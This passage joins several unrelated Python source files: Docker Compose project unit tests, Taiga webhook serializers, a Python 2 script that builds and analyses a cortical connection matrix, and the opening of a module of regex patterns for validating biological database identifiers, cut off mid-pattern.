'image': 'busybox:latest',
},
], None)
project = Project.from_config('composetest', dicts, None)
self.assertEqual(len(project.services), 2)
self.assertEqual(project.get_service('web').name, 'web')
self.assertEqual(project.get_service('web').options['image'], 'busybox:latest')
self.assertEqual(project.get_service('db').name, 'db')
self.assertEqual(project.get_service('db').options['image'], 'busybox:latest')
def test_get_service(self):
web = Service(
project='composetest',
name='web',
client=None,
image="busybox:latest",
)
project = Project('test', [web], None)
self.assertEqual(project.get_service('web'), web)
def test_get_services_returns_all_services_without_args(self):
web = Service(
project='composetest',
name='web',
image='foo',
)
console = Service(
project='composetest',
name='console',
image='foo',
)
project = Project('test', [web, console], None)
self.assertEqual(project.get_services(), [web, console])
def test_get_services_returns_listed_services_with_args(self):
web = Service(
project='composetest',
name='web',
image='foo',
)
console = Service(
project='composetest',
name='console',
image='foo',
)
project = Project('test', [web, console], None)
self.assertEqual(project.get_services(['console']), [console])
def test_get_services_with_include_links(self):
db = Service(
project='composetest',
name='db',
image='foo',
)
web = Service(
project='composetest',
name='web',
image='foo',
links=[(db, 'database')]
)
cache = Service(
project='composetest',
name='cache',
image='foo'
)
console = Service(
project='composetest',
name='console',
image='foo',
links=[(web, 'web')]
)
project = Project('test', [web, db, cache, console], None)
self.assertEqual(
project.get_services(['console'], include_deps=True),
[db, web, console]
)
def test_get_services_removes_duplicates_following_links(self):
db = Service(
project='composetest',
name='db',
image='foo',
)
web = Service(
project='composetest',
name='web',
image='foo',
links=[(db, 'database')]
)
project = Project('test', [web, db], None)
self.assertEqual(
project.get_services(['web', 'db'], include_deps=True),
[db, web]
)
def test_use_volumes_from_container(self):
container_id = 'aabbccddee'
container_dict = dict(Name='aaa', Id=container_id)
self.mock_client.inspect_container.return_value = container_dict
project = Project.from_config('test', Config(None, [
{
'name': 'test',
'image': 'busybox:latest',
'volumes_from': [VolumeFromSpec('aaa', 'rw')]
}
], None), self.mock_client)
self.assertEqual(project.get_service('test')._get_volumes_from(), [container_id + ":rw"])
def test_use_volumes_from_service_no_container(self):
container_name = 'test_vol_1'
self.mock_client.containers.return_value = [
{
"Name": container_name,
"Names": [container_name],
"Id": container_name,
"Image": 'busybox:latest'
}
]
project = Project.from_config('test', Config(None, [
{
'name': 'vol',
'image': 'busybox:latest'
},
{
'name': 'test',
'image': 'busybox:latest',
'volumes_from': [VolumeFromSpec('vol', 'rw')]
}
], None), self.mock_client)
self.assertEqual(project.get_service('test')._get_volumes_from(), [container_name + ":rw"])
def test_use_volumes_from_service_container(self):
container_ids = ['aabbccddee', '12345']
project = Project.from_config('test', Config(None, [
{
'name': 'vol',
'image': 'busybox:latest'
},
{
'name': 'test',
'image': 'busybox:latest',
'volumes_from': [VolumeFromSpec('vol', 'rw')]
}
], None), None)
with mock.patch.object(Service, 'containers') as mock_return:
mock_return.return_value = [
mock.Mock(id=container_id, spec=Container)
for container_id in container_ids]
self.assertEqual(
project.get_service('test')._get_volumes_from(),
[container_ids[0] + ':rw'])
def test_events(self):
services = [Service(name='web'), Service(name='db')]
project = Project('test', services, self.mock_client)
self.mock_client.events.return_value = iter([
{
'status': 'create',
'from': 'example/image',
'id': 'abcde',
'time': 1420092061,
'timeNano': 14200920610000002000,
},
{
'status': 'attach',
'from': 'example/image',
'id': 'abcde',
'time': 1420092061,
'timeNano': 14200920610000003000,
},
{
'status': 'create',
'from': 'example/other',
'id': 'bdbdbd',
'time': 1420092061,
'timeNano': 14200920610000005000,
},
{
'status': 'create',
'from': 'example/db',
'id': 'ababa',
'time': 1420092061,
'timeNano': 14200920610000004000,
},
])
def dt_with_microseconds(dt, us):
return datetime.datetime.fromtimestamp(dt).replace(microsecond=us)
def get_container(cid):
if cid == 'abcde':
name = 'web'
labels = {LABEL_SERVICE: name}
elif cid == 'ababa':
name = 'db'
labels = {LABEL_SERVICE: name}
else:
labels = {}
name = ''
return {
'Id': cid,
'Config': {'Labels': labels},
'Name': '/project_%s_1' % name,
}
self.mock_client.inspect_container.side_effect = get_container
events = project.events()
events_list = list(events)
# Assert the return value is a generator
assert not list(events)
assert events_list == [
{
'type': 'container',
'service': 'web',
'action': 'create',
'id': 'abcde',
'attributes': {
'name': 'project_web_1',
'image': 'example/image',
},
'time': dt_with_microseconds(1420092061, 2),
},
{
'type': 'container',
'service': 'web',
'action': 'attach',
'id': 'abcde',
'attributes': {
'name': 'project_web_1',
'image': 'example/image',
},
'time': dt_with_microseconds(1420092061, 3),
},
{
'type': 'container',
'service': 'db',
'action': 'create',
'id': 'ababa',
'attributes': {
'name': 'project_db_1',
'image': 'example/db',
},
'time': dt_with_microseconds(1420092061, 4),
},
]
def test_net_unset(self):
project = Project.from_config('test', Config(None, [
{
'name': 'test',
'image': 'busybox:latest',
}
], None), self.mock_client)
service = project.get_service('test')
self.assertEqual(service.net.id, None)
self.assertNotIn('NetworkMode', service._get_container_host_config({}))
def test_use_net_from_container(self):
container_id = 'aabbccddee'
container_dict = dict(Name='aaa', Id=container_id)
self.mock_client.inspect_container.return_value = container_dict
project = Project.from_config('test', Config(None, [
{
'name': 'test',
'image': 'busybox:latest',
'net': 'container:aaa'
}
], None), self.mock_client)
service = project.get_service('test')
self.assertEqual(service.net.mode, 'container:' + container_id)
def test_use_net_from_service(self):
container_name = 'test_aaa_1'
self.mock_client.containers.return_value = [
{
"Name": container_name,
"Names": [container_name],
"Id": container_name,
"Image": 'busybox:latest'
}
]
project = Project.from_config('test', Config(None, [
{
'name': 'aaa',
'image': 'busybox:latest'
},
{
'name': 'test',
'image': 'busybox:latest',
'net': 'container:aaa'
}
], None), self.mock_client)
service = project.get_service('test')
self.assertEqual(service.net.mode, 'container:' + container_name)
def test_uses_default_network_true(self):
web = Service('web', project='test', image="alpine", net=Net('test'))
db = Service('web', project='test', image="alpine", net=Net('other'))
project = Project('test', [web, db], None)
assert project.uses_default_network()
def test_uses_default_network_custom_name(self):
web = Service('web', project='test', image="alpine", net=Net('other'))
project = Project('test', [web], None)
assert not project.uses_default_network()
def test_uses_default_network_host(self):
web = Service('web', project='test', image="alpine", net=Net('host'))
project = Project('test', [web], None)
assert not project.uses_default_network()
def test_uses_default_network_container(self):
container = mock.Mock(id='test')
web = Service(
'web',
project='test',
image="alpine",
net=ContainerNet(container))
project = Project('test', [web], None)
assert not project.uses_default_network()
def test_container_without_name(self):
self.mock_client.containers.return_value = [
{'Image': 'busybox:latest', 'Id': '1', 'Name': '1'},
{'Image': 'busybox:latest', 'Id': '2', 'Name': None},
{'Image': 'busybox:latest', 'Id': '3'},
]
self.mock_client.inspect_container.return_value = {
'Id': '1',
'Config': {
'Labels': {
LABEL_SERVICE: 'web',
},
},
}
project = Project.from_config(
'test',
Config(None, [{
'name': 'web',
'image': 'busybox:latest',
}], None),
self.mock_client,
)
self.assertEqual([c.id for c in project.containers()], ['1'])
|
# -*- coding: utf-8 -*-
# Copyright (C) 2014-present Taiga Agile LLC
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.core.exceptions import ObjectDoesNotExist
from taiga.base.api import serializers
from taiga.base.fields import Field, MethodField
from taiga.front.templatetags.functions import resolve as resolve_front_url
from taiga.projects.services import get_logo_big_thumbnail_url
from taiga.users.services import get_user_photo_url
from taiga.users.gravatar import get_user_gravatar_id
########################################################################
# WebHooks
########################################################################
class WebhookSerializer(serializers.LightSerializer):
id = Field()
project = Field(attr="project_id")
name = Field()
url = Field()
key = Field()
logs_counter = MethodField()
def get_logs_counter(self, obj):
return obj.logs.count()
class WebhookLogSerializer(serializers.LightSerializer):
id = Field()
webhook = Field(attr="webhook_id")
url = Field()
status = Field()
request_data = Field()
request_headers = Field()
response_data = Field()
response_headers = Field()
duration = Field()
created = Field()
########################################################################
# User
########################################################################
class UserSerializer(serializers.LightSerializer):
id = Field(attr="pk")
permalink = MethodField()
username = MethodField()
full_name = MethodField()
photo = MethodField()
gravatar_id = MethodField()
def get_permalink(self, obj):
return resolve_front_url("user", obj.username)
def get_username(self, obj):
return obj.get_username()
def get_full_name(self, obj):
return obj.get_full_name()
def get_photo(self, obj):
return get_user_photo_url(obj)
def get_gravatar_id(self, obj):
return get_user_gravatar_id(obj)
def to_value(self, instance):
if instance is None:
return None
return super().to_value(instance)
########################################################################
# Project
########################################################################
class ProjectSerializer(serializers.LightSerializer):
id = Field(attr="pk")
permalink = MethodField()
name = MethodField()
logo_big_url = MethodField()
def get_permalink(self, obj):
return resolve_front_url("project", obj.slug)
def get_name(self, obj):
return obj.name
def get_logo_big_url(self, obj):
return get_logo_big_thumbnail_url(obj)
########################################################################
# History Serializer
########################################################################
class HistoryDiffField(Field):
def to_value(self, value):
# Tip: 'value' is the object returned by
# taiga.projects.history.models.HistoryEntry.values_diff()
ret = {}
for key, val in value.items():
if key in ["attachments", "custom_attributes", "description_diff"]:
ret[key] = val
elif key == "points":
ret[key] = {k: {"from": v[0], "to": v[1]} for k, v in val.items()}
else:
ret[key] = {"from": val[0], "to": val[1]}
return ret
class HistoryEntrySerializer(serializers.LightSerializer):
comment = Field()
comment_html = Field()
delete_comment_date = Field()
comment_versions = Field()
edit_comment_date = Field()
diff = HistoryDiffField(attr="values_diff")
########################################################################
# _Misc_
########################################################################
class CustomAttributesValuesWebhookSerializerMixin(serializers.LightSerializer):
custom_attributes_values = MethodField()
def custom_attributes_queryset(self, project):
raise NotImplementedError()
def get_custom_attributes_values(self, obj):
def _use_name_instead_id_as_key_in_custom_attributes_values(custom_attributes, values):
ret = {}
for attr in custom_attributes:
value = values.get(str(attr["id"]), None)
if value is not None:
ret[attr["name"]] = value
return ret
try:
values = obj.custom_attributes_values.attributes_values
custom_attributes = self.custom_attributes_queryset(obj.project).values('id', 'name')
return _use_name_instead_id_as_key_in_custom_attributes_values(custom_attributes, values)
except ObjectDoesNotExist:
return None
class RolePointsSerializer(serializers.LightSerializer):
role = MethodField()
name = MethodField()
value = MethodField()
def get_role(self, obj):
return obj.role.name
def get_name(self, obj):
return obj.points.name
def get_value(self, obj):
return obj.points.value
class EpicStatusSerializer(serializers.LightSerializer):
id = Field(attr="pk")
name = MethodField()
slug = MethodField()
color = MethodField()
is_closed = MethodField()
def get_name(self, obj):
return obj.name
def get_slug(self, obj):
return obj.slug
def get_color(self, obj):
return obj.color
def get_is_closed(self, obj):
return obj.is_closed
class UserStoryStatusSerializer(serializers.LightSerializer):
id = Field(attr="pk")
name = MethodField()
slug = MethodField()
color = MethodField()
is_closed = MethodField()
is_archived = MethodField()
def get_name(self, obj):
return obj.name
def get_slug(self, obj):
return obj.slug
def get_color(self, obj):
return obj.color
def get_is_closed(self, obj):
return obj.is_closed
def get_is_archived(self, obj):
return obj.is_archived
class TaskStatusSerializer(serializers.LightSerializer):
id = Field(attr="pk")
name = MethodField()
slug = MethodField()
color = MethodField()
is_closed = MethodField()
def get_name(self, obj):
return obj.name
def get_slug(self, obj):
return obj.slug
def get_color(self, obj):
return obj.color
def get_is_closed(self, obj):
return obj.is_closed
class IssueStatusSerializer(serializers.LightSerializer):
id = Field(attr="pk")
name = MethodField()
slug = MethodField()
color = MethodField()
is_closed = MethodField()
def get_name(self, obj):
return obj.name
def get_slug(self, obj):
return obj.slug
def get_color(self, obj):
return obj.color
def get_is_closed(self, obj):
return obj.is_closed
class IssueTypeSerializer(serializers.LightSerializer):
id = Field(attr="pk")
name = MethodField()
color = MethodField()
def get_name(self, obj):
return obj.name
def get_color(self, obj):
return obj.color
class PrioritySerializer(serializers.LightSerializer):
id = Field(attr="pk")
name = MethodField()
color = MethodField()
def get_name(self, obj):
return obj.name
def get_color(self, obj):
return obj.color
class SeveritySerializer(serializers.LightSerializer):
id = Field(attr="pk")
name = MethodField()
color = MethodField()
def get_name(self, obj):
return obj.name
def get_color(self, obj):
return obj.color
########################################################################
# Milestone
########################################################################
class MilestoneSerializer(serializers.LightSerializer):
id = Field()
name = Field()
slug = Field()
estimated_start = Field()
estimated_finish = Field()
created_date = Field()
modified_date = Field()
closed = Field()
disponibility = Field()
permalink = MethodField()
project = ProjectSerializer()
owner = UserSerializer()
def get_permalink(self, obj):
return resolve_front_url("taskboard", obj.project.slug, obj.slug)
def to_value(self, instance):
if instance is None:
return None
return super().to_value(instance)
########################################################################
# User Story
########################################################################
class UserStorySerializer(CustomAttributesValuesWebhookSerializerMixin, serializers.LightSerializer):
id = Field()
ref = Field()
project = ProjectSerializer()
is_closed = Field()
created_date = Field()
modified_date = Field()
finish_date = Field()
due_date = Field()
due_date_reason = Field()
subject = Field()
client_requirement = Field()
team_requirement = Field()
generated_from_issue = Field(attr="generated_from_issue_id")
generated_from_task = Field(attr="generated_from_task_id")
from_task_ref = Field()
external_reference = Field()
tribe_gig = Field()
watchers = MethodField()
is_blocked = Field()
blocked_note = Field()
description = Field()
tags = Field()
permalink = MethodField()
owner = UserSerializer()
assigned_to = UserSerializer()
assigned_users = MethodField()
points = MethodField()
status = UserStoryStatusSerializer()
milestone = MilestoneSerializer()
def get_permalink(self, obj):
return resolve_front_url("userstory", obj.project.slug, obj.ref)
def custom_attributes_queryset(self, project):
return project.userstorycustomattributes.all()
def get_assigned_users(self, obj):
"""Get the assigned of an object.
:return: User queryset object representing the assigned users
"""
return [user.id for user in obj.assigned_users.all()]
def get_watchers(self, obj):
return list(obj.get_watchers().values_list("id", flat=True))
def get_points(self, obj):
return RolePointsSerializer(obj.role_points.all(), many=True).data
########################################################################
# Task
########################################################################
class TaskSerializer(CustomAttributesValuesWebhookSerializerMixin, serializers.LightSerializer):
id = Field()
ref = Field()
created_date = Field()
modified_date = Field()
finished_date = Field()
due_date = Field()
due_date_reason = Field()
subject = Field()
us_order = Field()
taskboard_order = Field()
is_iocaine = Field()
external_reference = Field()
watchers = MethodField()
is_blocked = Field()
blocked_note = Field()
description = Field()
tags = Field()
permalink = MethodField()
project = ProjectSerializer()
owner = UserSerializer()
assigned_to = UserSerializer()
status = TaskStatusSerializer()
user_story = UserStorySerializer()
milestone = MilestoneSerializer()
promoted_to = MethodField()
def get_permalink(self, obj):
return resolve_front_url("task", obj.project.slug, obj.ref)
def custom_attributes_queryset(self, project):
return project.taskcustomattributes.all()
def get_watchers(self, obj):
return list(obj.get_watchers().values_list("id", flat=True))
def get_promoted_to(self, obj):
return list(obj.generated_user_stories.values_list("id", flat=True))
########################################################################
# Issue
########################################################################
class IssueSerializer(CustomAttributesValuesWebhookSerializerMixin, serializers.LightSerializer):
id = Field()
ref = Field()
created_date = Field()
modified_date = Field()
finished_date = Field()
due_date = Field()
due_date_reason = Field()
subject = Field()
external_reference = Field()
watchers = MethodField()
description = Field()
tags = Field()
permalink = MethodField()
project = ProjectSerializer()
milestone = MilestoneSerializer()
owner = UserSerializer()
assigned_to = UserSerializer()
status = IssueStatusSerializer()
type = IssueTypeSerializer()
priority = PrioritySerializer()
severity = SeveritySerializer()
promoted_to = MethodField()
def get_permalink(self, obj):
return resolve_front_url("issue", obj.project.slug, obj.ref)
def custom_attributes_queryset(self, project):
return project.issuecustomattributes.all()
def get_watchers(self, obj):
return list(obj.get_watchers().values_list("id", flat=True))
def get_promoted_to(self, obj):
return list(obj.generated_user_stories.values_list("id", flat=True))
########################################################################
# Wiki Page
########################################################################
class WikiPageSerializer(serializers.LightSerializer):
id = Field()
slug = Field()
content = Field()
created_date = Field()
modified_date = Field()
permalink = MethodField()
project = ProjectSerializer()
owner = UserSerializer()
last_modifier = UserSerializer()
def get_permalink(self, obj):
return resolve_front_url("wiki", obj.project.slug, obj.slug)
########################################################################
# Epic
########################################################################
class EpicSerializer(CustomAttributesValuesWebhookSerializerMixin, serializers.LightSerializer):
id = Field()
ref = Field()
created_date = Field()
modified_date = Field()
subject = Field()
watchers = MethodField()
description = Field()
tags = Field()
permalink = MethodField()
project = ProjectSerializer()
owner = UserSerializer()
assigned_to = UserSerializer()
status = EpicStatusSerializer()
epics_order = Field()
color = Field()
client_requirement = Field()
team_requirement = Field()
def get_permalink(self, obj):
return resolve_front_url("epic", obj.project.slug, obj.ref)
def custom_attributes_queryset(self, project):
return project.epiccustomattributes.all()
def get_watchers(self, obj):
return list(obj.get_watchers().values_list("id", flat=True))
class EpicRelatedUserStorySerializer(serializers.LightSerializer):
id = Field()
user_story = MethodField()
epic = MethodField()
order = Field()
def get_user_story(self, obj):
return UserStorySerializer(obj.user_story).data
def get_epic(self, obj):
return EpicSerializer(obj.epic).data
|
import numpy as np
from scipy import linalg as la
import time
import params110 as pm
start_time = time.time()
print "Initializing and creating connection matrix..."
conn_matrix = np.zeros((pm.nrns,pm.nrns))
#pbar.start()
count23,count4,count5,countA,countB,countAz,countQ,countW = 0,0,0,0,0,0,0,0
for i in range(pm.nrns):
for j in range(pm.nrns):
if pm.same_minicolumn(i,j):
if i in pm.layers23 and j in pm.layers23:
if pm.both_exc(i,j):
conn_matrix[j][i]= pm.flip(0.26,i)
count23 = pm.check_count(count23, conn_matrix[j][i])
elif pm.both_inh(i,j):
conn_matrix[j][i]= pm.flip(0.25,i)
count23 = pm.check_count(count23, conn_matrix[j][i])
elif i in pm.exc_nrns_set and j in pm.inh_nrns_set:
conn_matrix[j][i]= pm.flip(0.21,i)
count23 = pm.check_count(count23, conn_matrix[j][i])
else:
conn_matrix[j][i]= pm.flip(0.16,i)
count23 = pm.check_count(count23, conn_matrix[j][i])
# LAYER 4
elif i in pm.layers4 and j in pm.layers4:
if pm.both_exc(i,j):
conn_matrix[j][i]= pm.flip(0.17,i)
count4 = pm.check_count(count4, conn_matrix[j][i])
elif pm.both_inh(i,j):
conn_matrix[j][i]= pm.flip(0.50,i)
count4 = pm.check_count(count4, conn_matrix[j][i])
elif i in pm.exc_nrns_set and j in pm.inh_nrns_set:
conn_matrix[j][i]= pm.flip(0.19,i)
count4 = pm.check_count(count4, conn_matrix[j][i])
else:
conn_matrix[j][i]= pm.flip(0.10,i)
count4 = pm.check_count(count4, conn_matrix[j][i])
# LAYER 5
elif i in pm.layers5 and j in pm.layers5:
if pm.both_exc(i,j):
conn_matrix[j][i]= pm.flip(0.09,i)
count5 = pm.check_count(count5, conn_matrix[j][i])
elif pm.both_inh(i,j):
conn_matrix[j][i]= pm.flip(0.60,i)
count5 = pm.check_count(count5, conn_matrix[j][i])
elif i in pm.exc_nrns_set and j in pm.inh_nrns_set:
conn_matrix[j][i]= pm.flip(0.10,i)
count5 = pm.check_count(count5, conn_matrix[j][i])
else:
conn_matrix[j][i]= pm.flip(0.12,i)
count5 = pm.check_count(count5, conn_matrix[j][i])
# FROM LAYER4 -> LAYER2/3
elif i in pm.layers4 and j in pm.layers23:
if pm.both_exc(i,j):
conn_matrix[j][i]= pm.flip(0.28,i)
countA = pm.check_count(countA, conn_matrix[j][i])
elif pm.both_inh(i,j):
conn_matrix[j][i]= pm.flip(0.20,i)
countA = pm.check_count(countA, conn_matrix[j][i])
elif i in pm.exc_nrns_set and j in pm.inh_nrns_set:
conn_matrix[j][i]= pm.flip(0.10,i)
countA = pm.check_count(countA, conn_matrix[j][i])
else:
conn_matrix[j][i]= pm.flip(0.50,i)
countA = pm.check_count(countA, conn_matrix[j][i])
# FROM LAYER2/3 -> LAYER5
elif i in pm.layers23 and j in pm.layers5:
if pm.both_exc(i,j):
conn_matrix[j][i]= pm.flip(0.55,i)
countB = pm.check_count(countB, conn_matrix[j][i])
elif pm.both_inh(i,j):
conn_matrix[j][i]= pm.flip(0.0001,i)
countB = pm.check_count(countB, conn_matrix[j][i])
elif i in pm.exc_nrns_set and j in pm.inh_nrns_set:
conn_matrix[j][i]= pm.flip(0.001,i)
countB = pm.check_count(countB, conn_matrix[j][i])
else:
conn_matrix[j][i]= pm.flip(0.20,i)
countB = pm.check_count(countB, conn_matrix[j][i])
#:::
elif not pm.same_minicolumn(i,j):
conn_matrix[j][i] = pm.flip(0.102,i)
countQ = pm.check_count(countQ,conn_matrix[j][i])
print ("Matrix Created in %.5s seconds." % (time.time() - start_time))
#_________________________________________________________________________________________
#"""
print "connections 2/3 = ", count23
print "connections 4 = ", count4
print "connections 5 = ", count5
print "not same minicolumn, same hypercolumn = ",countQ
print "not same hypercolumn = ",countAz
print "connections 30%", count23+count4+count5+countQ
print "connections 70%", countAz
#"""
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
k=[]
for i in range(pm.nrns):
if np.sum(conn_matrix[i,:]) > 1e-5:
k.append(i)
print "Row sums not zero", len(k)
pm.balanceN(conn_matrix)
#for i in range(len(k)):
# balance(conn_matrix[k[i],:])
#"""
delta =0
for i in range(pm.nrns):
if np.sum(conn_matrix[i,:]) > 1e-5:
delta+=1
#print np.sum(conn_matrix[i,:])
#print i
print "sum of all matrix",np.sum(conn_matrix)
print "Row sums not to zero after balance",delta
g = 0
for i in range(pm.nrns):
for j in range(pm.nrns):
if abs(conn_matrix[j][i]) > 1e-4:
g+=1
print "total connections: ", g
print "% connections within a minicolumn= ", round((count23+count4+count5+countA+countB)/float(g)*100.)
print "% connections outside a minicolumn= ", round(float(float(countQ)/float(g))*100.)
print
h,z=0,0
for i in range(pm.nrns):
if i in pm.exc_nrns_set:
for j in conn_matrix[:,i]:
if j < 0:
h+=1
if i in pm.inh_nrns_set:
for j in conn_matrix[:,i]:
if j > 0:
z+=1
print h,"negatives in exc"
print z,"positives in inh"
gh = 0
for i in conn_matrix[1][:]:
if i < -1e-4 or i > 1e-4:
gh+=1
print gh
#"""
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#"""
ee = la.eigvals(conn_matrix)
conn_matrix.dump("110.dat")
print "done"
"""
xl = np.linspace(-30,30,61)
yl = np.linspace(-30,30,61)
con_density = np.zeros((len(xl),len(yl)))
st = []
for i in range(len(trials)):
ee = trials[i]
for ii in range(len(ee)):
xid = plt.find(xl>=ee[ii].imag)[0]
yid = plt.find(yl>=ee[ii].real)[0]
con_density[xid,yid] = con_density[xid,yid]+1
st.append(con_density)
for i in st:
pcolor(i)
colorbar()
#con_density = con_density#/len(ee)
pcolor(con_density)
print ("Matrix Created in %.5s seconds." % (time.time() - start_time))
print str(100.-(len(plt.find(abs(ee) > 15))/float(len(ee)) *100.))+" of the eigenvalues are in the 15 radius circle"
print "two largest eigenvalues by magnitude %.5s, " % abs(ee)[0]+"%.5s " %abs(ee)[1]
print "Loading plot..."
plt.figure(1)
#plt.subplot(1,2,1)
hist5,xedges,yedges = np.histogram2d(ee.real,ee.imag,bins=30,normed=False)
extent = [-20, 20, -20, 20 ]
plt.imshow(hist5.T,extent=extent,interpolation='nearest',origin='lower')
#plt.colorbar()
#plt.show()
ed = np.linspace(-4.,1,1e3)
hh,ed= np.histogram(conn_matrix.flatten(),ed)
tt = np.linspace(np.pi,-np.pi,1e2)
sx = np.sin(tt)
sy = np.cos(tt)
ed_ev = np.linspace(-20,20,1e2)
hh_real,ed1 = np.histogram(ee.real,ed_ev)
hh_imag,ed1 = np.histogram(ee.imag,ed_ev)
#plt.clf()
#plt.subplot(1,2,2)
plt.scatter(ee.real,ee.imag)
plt.plot(sx,sy,'r')
plt.plot(15*sx,15*sy,'g')
#plt.pcolor(conn_matrix, cmap=plt.cm.Blues)
plt.title("%.8s variance," % pm.sigma**2 +str(pm.mu)+" mean")
#plt.axis('equal')
plt.xlim(min(ed_ev),max(ed_ev))
plt.ylim(min(ed_ev),max(ed_ev))
plt.show()
noB_var_row = np.var(conn_matrix,1)
noB_var_col = np.var(conn_matrix,0)
B_var_row = np.var(conn_matrix,1)
B_var_col = np.var(conn_matrix,0)
plt.subplot(3,2,2)
plt.plot(hh_imag,ed_ev[0:-1])
plt.ylim(min(ed_ev),max(ed_ev))
#plt.ylim(0,100)
plt.xlabel("max ee.real %.5s" % np.max(ee.real) + " max ee.imag %.5s" %np.max(ee.imag))
plt.subplot(3,2,3)
plt.plot(ed_ev[0:-1],hh_real)
plt.xlim(min(ed_ev),max(ed_ev))
plt.subplot(3,2,4)
#plt.plot(noB_var_row)#, cmap=plt.cm.RdYlBu)
#plt.plot(noB_var_col)#, cmap=plt.cm.RdYlBu)
#plt.plot(B_var_row)#, cmap=plt.cm.RdYlBu)
plt.plot(B_var_col)#, cmap=plt.cm.RdYlBu)
plt.subplot(3,2,5)
plt.pcolor(conn_matrix)#, cmap=plt.cm.RdYlBu)
plt.subplot(3,2,6)
plt.plot(ed[0:-1],hh)
#plt.ylim(0,800)
plt.show()
#"""
|
# -*- coding: utf-8 -*-
# Copyright 2017 Novo Nordisk Foundation Center for Biosustainability,
# Technical University of Denmark.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Supporting functions for annotation checks performed on the model object."""
from __future__ import absolute_import
import logging
import re
from collections import OrderedDict
import pandas as pd
from future.utils import native_str
LOGGER = logging.getLogger(__name__)
# MIRIAM (http://www.ebi.ac.uk/miriam/) styled identifiers for
# common databases that are currently included are:
# DB gen,rxn,met url
#
# 'MetaNetX' ['rxn','met'] 'http://www.metanetx.org'
# 'Kegg' ['gen','rxn','met'] 'http://www.kegg.jp/'
# 'SEED' ['met'] 'http://modelseed.org/'
#
# 'InChI' ['met'] 'https://www.ebi.ac.uk/chebi/'
# 'InChIKey' ['met'] 'http://cactus.nci.nih.gov/chemical/structure'
# 'ChEBI' ['met'] 'http://bioportal.bioontology.org/ontologies/CHEBI'
# 'BRENDA' ['rxn'] 'http://www.brenda-enzymes.org/'
# 'RHEA' ['rxn'] 'http://www.rhea-db.org/'
# 'HMDB' ['met'] 'http://www.hmdb.ca/'
#
# 'BioCyc' ['rxn','met'] 'http://biocyc.org'
# 'Reactome' ['rxn','met'] 'http://www.reactome.org/'
# 'BiGG' ['rxn','met'] 'http://bigg.ucsd.edu/universal/'
# 'PubChem' ['met'] 'https://pubchem.ncbi.nlm.nih.gov/'
# 'RefSeq' ['gen'] 'http://www.ncbi.nlm.nih.gov/projects/RefSeq/'
# 'Uniprot' ['gen'] 'http://www.uniprot.org/'
# 'EC-Code' ['rxn'] 'http://www.enzyme-database.org/'
# 'EcoGene' ['gen'] 'http://ecogene.org/'
# 'NCBI GI' ['gen'] 'http://www.ncbi.nlm.nih.gov/protein/'
# 'NCBI Gene' ['gen'] 'http://ncbigene.bio2rdf.org/fct'
# 'NCBI Protein'['gen'] 'http://www.ncbi.nlm.nih.gov/protein'
# 'CCDS' ['gen'] 'http://www.ncbi.nlm.nih.gov/CCDS/'
# 'HPRD' ['gen'] 'http://www.hprd.org/'
# 'ASAP' ['gen'] 'http://asap.ahabs.wisc.edu/asap/home.php'
GENE_PRODUCT_ANNOTATIONS = OrderedDict(
[
(
"refseq",
re.compile(
r"^((AC|AP|NC|NG|NM|NP|NR|NT|"
r"NW|XM|XP|XR|YP|ZP)_\d+|"
r"(NZ\_[A-Z]{4}\d+))(\.\d+)?$"
),
),
(
"uniprot",
re.compile(
r"^([A-N,R-Z][0-9]([A-Z][A-Z, 0-9]"
r"[A-Z, 0-9][0-9]){1,2})|([O,P,Q]"
r"[0-9][A-Z, 0-9][A-Z, 0-9][A-Z, 0-9]"
r"[0-9])(\.\d+)?$"
),
),
("ecogene", re.compile(r"^EG\d+$")),
("kegg.genes", re.compile(r"^\w+:[\w\d\.-]*$")),
("ncbigi", re.compile(r"^(GI|gi)\:\d+$")),
("ncbigene", re.compile(r"^\d+$")),
("ncbiprotein", re.compile(r"^(\w+\d+(\.\d+)?)|(NP_\d+)$")),
("ccds", re.compile(r"^CCDS\d+\.\d+$")),
("hprd", re.compile(r"^\d+$")),
("asap", re.compile(r"^[A-Za-z0-9-]+$")),
]
)
REACTION_ANNOTATIONS = OrderedDict(
[
("rhea", re.compile(r"^\d{5}$")),
("kegg.reaction", re.compile(r"^R\d+$")),
("seed.reaction", re.compile(r"^rxn\d+$")),
("metanetx.reaction", re.compile(r"^MNXR\d+$")),
("bigg.reaction", re.compile(r"^[a-z_A-Z0-9]+$")),
(
"reactome",
re.compile(r"(^R-[A-Z]{3}-[0-9]+(-[0-9]+)?$)|(^REACT_\d+(\.\d+)?$)"),
),
(
"ec-code",
re.compile(
r"^\d+\.-\.-\.-|\d+\.\d+\.-\.-|"
r"\d+\.\d+\.\d+\.-|"
r"\d+\.\d+\.\d+\.(n)?\d+$"
),
),
(
"brenda",
re.compile(
r"^\d+\.-\.-\.-|\d+\.\d+\.-\.-|"
r"\d+\.\d+\.\d+\.-|"
r"\d+\.\d+\.\d+\.(n)?\d+$"
),
),
("biocyc", re.compile(r"^[A-Z-0-9]+(?<!CHEBI)" r"(\:)?[A-Za-z0-9+_.%-]+$")),
]
)
METABOLITE_ANNOTATIONS = OrderedDict(
[
("pubchem.compound", re.compile(r"^\d+$")),
("kegg.compound", re.compile(r"^C\d+$")),
("seed.compound", re.compile(r"^cpd\d+$")),
("inchikey", re.compile(r"^[A-Z]{14}\-[A-Z]{10}(\-[A-Z])?")),
(
"inchi",
re.compile(
r"^InChI\=1S?\/[A-Za-z0-9\.]+(\+[0-9]+)?"
